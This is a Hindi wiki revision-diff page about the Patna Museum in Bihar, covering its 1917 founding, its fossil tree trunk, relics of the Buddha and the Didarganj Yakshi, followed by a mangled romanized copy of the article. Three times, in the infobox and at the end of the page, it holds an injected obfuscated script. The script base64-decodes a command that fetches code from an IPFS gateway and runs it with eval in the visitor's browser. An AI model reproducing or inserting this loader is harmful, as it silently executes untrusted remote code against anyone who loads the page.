Difference between revisions of "पटना संग्रहालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 20: Line 20:
 
|अद्यतन={{अद्यतन|11:06, 9 मई 2012 (IST)}}
 
|अद्यतन={{अद्यतन|11:06, 9 मई 2012 (IST)}}
 
}}
 
}}
'''पटना संग्रहालय''' [[बिहार]] के [[पटना]] शहर में स्थित है। पटना संग्रहालय जादूघर के नाम से भी जाना जाता है।
+
'''पटना संग्रहालय''' [[बिहार]] के [[पटना]] शहर में स्थित है। पटना संग्रहालय 'जादूघर' के नाम से भी जाना जाता है।
 
*पटना संग्रहालय [[1917]] में बना बिहार का पहला संग्रहालय है।   
 
*पटना संग्रहालय [[1917]] में बना बिहार का पहला संग्रहालय है।   
 
*पटना संग्रहालय में प्राचीन पटना के [[हिन्दू]] तथा [[बौद्ध धर्म]] की कई निशानियाँ हैं।  
 
*पटना संग्रहालय में प्राचीन पटना के [[हिन्दू]] तथा [[बौद्ध धर्म]] की कई निशानियाँ हैं।  
*लगभग 20 करोड़ वर्ष पुराने पेड़ के तने का फॉसिल यहाँ का विशेष धरोहर है।  
+
*लगभग 20 करोड़ वर्ष पुराने पेड़ के तने का [[अवशेष]] यहाँ का विशेष धरोहर है।  
*16 मीटर लंबा तने का फॉसिल, भगवान [[बुद्ध]] की अस्थियाँ तथा [[दीदारगंज]], पटना सिटी से प्राप्त यक्षिणी की मूर्ति यहाँ की विशेष धरोहर है।  
+
*16 मीटर लंबा तने का अवशेष, भगवान [[बुद्ध]] की अस्थियाँ तथा [[दीदारगंज]], पटना सिटी से प्राप्त यक्षिणी की मूर्ति यहाँ की विशेष धरोहर है।  
 
*पटना का संग्रहालय ऐतिहासिक रूप से काफ़ी धनी है।  
 
*पटना का संग्रहालय ऐतिहासिक रूप से काफ़ी धनी है।  
*पटना संग्रहालय में मौर्य और गुप्‍त काल की मूर्तियाँ (पत्‍थर और लोहे की बनी हुई) टेराकोटा, महात्‍मा बुद्ध, [[शक]], [[कुषाण]] का राख आदि संरक्षित है।  
+
*पटना संग्रहालय में [[मौर्य काल|मौर्य]] और [[गुप्तकाल|गुप्‍त काल]] की मूर्तियाँ (पत्‍थर और लोहे की बनी हुई) [[टेराकॉटा]], महात्‍मा बुद्ध, [[शक]], [[कुषाण]] का राख आदि संरक्षित है।  
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 10:36, 10 May 2012

patana sangrahalay
[[chitr:Patna-Museum.jpg|patana sangrahalay, patana|200px|center]]
vivaran patana sangrahalay jadooghar ke nam se bhi jana jata hai.
rajy bihar
nagar patana
nirman san 1928
sthapana san 1917
marg sthiti patana sangrahalay patana relave steshan se lagabhag 3 kimi ki doori par sthit hai.
prasiddhi patana sangrahalay mean prachin patana ke hindoo tatha bauddh dharm ki kee nishaniyaan haian.
chitr:Map-icon.gif googal manachitr
any janakari patana sangrahalay mean maury aur guph‍t kal ki moortiyaan (path‍thar aur lohe ki bani huee) terakota, mahath‍ma buddh, shak, kushan ka rakh adi sanrakshit hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

patana sangrahalay bihar ke patana shahar mean sthit hai. patana sangrahalay 'jadooghar' ke nam se bhi jana jata hai.

  • patana sangrahalay 1917 mean bana bihar ka pahala sangrahalay hai.
  • patana sangrahalay mean prachin patana ke hindoo tatha bauddh dharm ki kee nishaniyaan haian.
  • lagabhag 20 karo d varsh purane pe d ke tane ka avashesh yahaan ka vishesh dharohar hai.
  • 16 mitar lanba tane ka avashesh, bhagavan buddh ki asthiyaan tatha didaraganj, patana siti se prapt yakshini ki moorti yahaan ki vishesh dharohar hai.
  • patana ka sangrahalay aitihasik roop se kafi dhani hai.
  • patana sangrahalay mean maury aur guph‍t kal ki moortiyaan (path‍thar aur lohe ki bani huee) terak aauta, mahath‍ma buddh, shak, kushan ka rakh adi sanrakshit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>